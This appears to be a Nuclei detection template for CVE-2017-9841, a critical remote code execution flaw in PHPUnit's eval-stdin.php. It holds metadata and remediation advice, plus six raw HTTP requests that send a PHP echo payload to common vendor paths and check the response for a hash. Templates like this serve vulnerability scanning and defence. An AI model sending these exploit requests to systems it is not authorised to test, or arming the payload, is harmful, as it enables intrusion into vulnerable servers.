79 lines
2.7 KiB
YAML
79 lines
2.7 KiB
YAML
id: CVE-2017-9841
|
|
|
|
info:
|
|
name: PHPUnit - Remote Code Execution
|
|
author: Random_Robbie,pikpikcu
|
|
severity: critical
|
|
description: PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring via Util/PHP/eval-stdin.php , as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
|
|
remediation: |
|
|
Upgrade to PHPUnit version 5.7.21 or 6.1.6 or later.
|
|
reference:
|
|
- https://github.com/cyberharsh/Php-unit-CVE-2017-9841
|
|
- https://github.com/RandomRobbieBF/phpunit-brute
|
|
- https://thephp.cc/articles/phpunit-a-security-risk
|
|
- https://twitter.com/sec715/status/1411517028012158976
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-9841
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2017-9841
|
|
cwe-id: CWE-94
|
|
epss-score: 0.97477
|
|
epss-percentile: 0.99963
|
|
cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 6
|
|
vendor: phpunit_project
|
|
product: phpunit
|
|
tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/html
|
|
|
|
<?php echo md5(phpunit_rce);?>
|
|
- |
|
|
GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/html
|
|
|
|
<?php echo md5(phpunit_rce);?>
|
|
- |
|
|
GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/html
|
|
|
|
<?php echo md5(phpunit_rce);?>
|
|
- |
|
|
GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/html
|
|
|
|
<?php echo md5(phpunit_rce);?>
|
|
- |
|
|
GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/html
|
|
|
|
<?php echo md5(phpunit_rce);?>
|
|
- |
|
|
GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/html
|
|
|
|
<?php echo md5(phpunit_rce);?>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "6dd70f16549456495373a337e6708865"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100a8b27a306468aebf732343c961456cf2432fb5a516c6c85ff6c4c62f0c01316e022100f2d5e57852cf73ca6546ebd6ddfbbec82b18542a7a84767a25cc65335fe9213d:922c64590222798bb761d5b6d8e72950 |